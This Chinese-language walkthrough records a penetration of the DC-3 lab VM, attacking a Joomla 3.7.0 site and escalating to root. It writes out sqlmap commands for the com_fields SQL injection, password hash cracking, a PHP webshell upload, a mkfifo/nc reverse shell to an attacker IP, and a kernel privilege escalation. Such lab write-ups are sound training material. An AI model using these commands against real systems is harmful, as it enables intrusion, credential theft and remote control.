渗透DC-3靶机笔记

DC-3靶机渗透

和前两个靶机不同的是DC-3不需要找五个flag，这里只需要直接找到后台拿shell提权到root权限，所以没有太多线索，就是一个字，干！！
直接nmap扫描网段ip，开放端口，这里DC-3的IP是192.168.11.136
开放的端口是80，我们进入网站看看

首先他是一个登录界面，可以尝试爆破，但是还是先看一下有没有别的有用信息，浏览了一下界面没有什么可以利用到的界面；
其次可以用火狐插件查看网站的一些相关信息，这里CMS是joomla（也可以用whatweb网站识别工具），想到joomla网站扫描工具，好的出现第二个思路了；
最后来继续搜寻有用信息，看一下robots.txt和README.txt，果然README.txt可以看到CMS版本是3.x；

继续扫一下目录发现后台登录的目录以及一些打开空白的页面先这样留着

信息搜集到此结束；
我们试一下用工具joomscan扫一下网站有没有什么线索，发现：

一个是登录页面，一个是暴了版本信息，但是我们之前都已经查到了（所以是不是不用这个工具也罢，但是这个工具倒是挺省事儿）
后来我又发现好像有个注入点，不输入参数的时候把users这个表给暴出来了，但是一些比较特殊的字符都给过滤了，sqlmap也跑不出来我就放弃了

但是现在搜了一些joomla3.7.0，果然有个注入漏洞，我们打开42033.txt看看去


这里用sqlmap跑一下就完事儿

sqlmap -u "http://192.168.11.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch
sqlmap -u "http://192.168.11.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch -D joomladb --tables
sqlmap -u "http://192.168.11.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch -D joomladb -T users --columns
sqlmap -u "http://192.168.11.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch -D joomladb -T users -C "name,password" --dump

最后得到用户名admin和密码snoopy，需要注意的是密码是经过加密的，用john爆破hash密码就欧克！
这样我们等到账户用户名了登入网站后台查找有用信息，这里一般肯定会有信息然后让你拿到webshell的毕竟前面的工作也做了不少；
之后会发现templates的页面，可以上传PHP文件，而且template是不是感觉很熟悉，刚刚扫目录扫出来过，我们先试一下能不能上传一句话木马

然后去访问html下的222.php文件可以访问！！！然后用菜刀？？？不！！！
这里用菜刀是连不上的因为操作系统的问题，我花了好久最后才知道应该要用蚁剑才能连接上；

www-data用户，主机Ubuntu 16.04 内核 4.4.0-21，我们反弹shell到kali虚拟机：
kali先监听7777端口：nc -lnvp 7777
然后在蚁剑上输入：rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.129 7777 >/tmp/f
网上有许多shell反弹姿势，我也是借鉴网上的；

然后试了一般的提权姿势好像不可取，看一下内核版本可能是要通过内核提权
searchsploit ubantu 16.04
发现有不少可利用的漏洞，选一个打开txt文件看一下相关说明，然后就会发现

然后下载上传exploit.tar在shell界面解压编译exp就会获得root权限；
查看flag会提示welldone!!不多说了赶紧写个总结去看网课！！

总结：DC系列靶机前三个都和常和PHP搭配的三个CMS扯上了关系（drupal、joomla、wordpress）,而且通过CMS也可以进一步找到突破口从而拿到webshell,然后就是一个反弹shell常用姿势以及提取常用姿势的熟悉，DC靶机系列刷完了再做一个系统性的总结！还有就是希望疫情赶紧过去！！！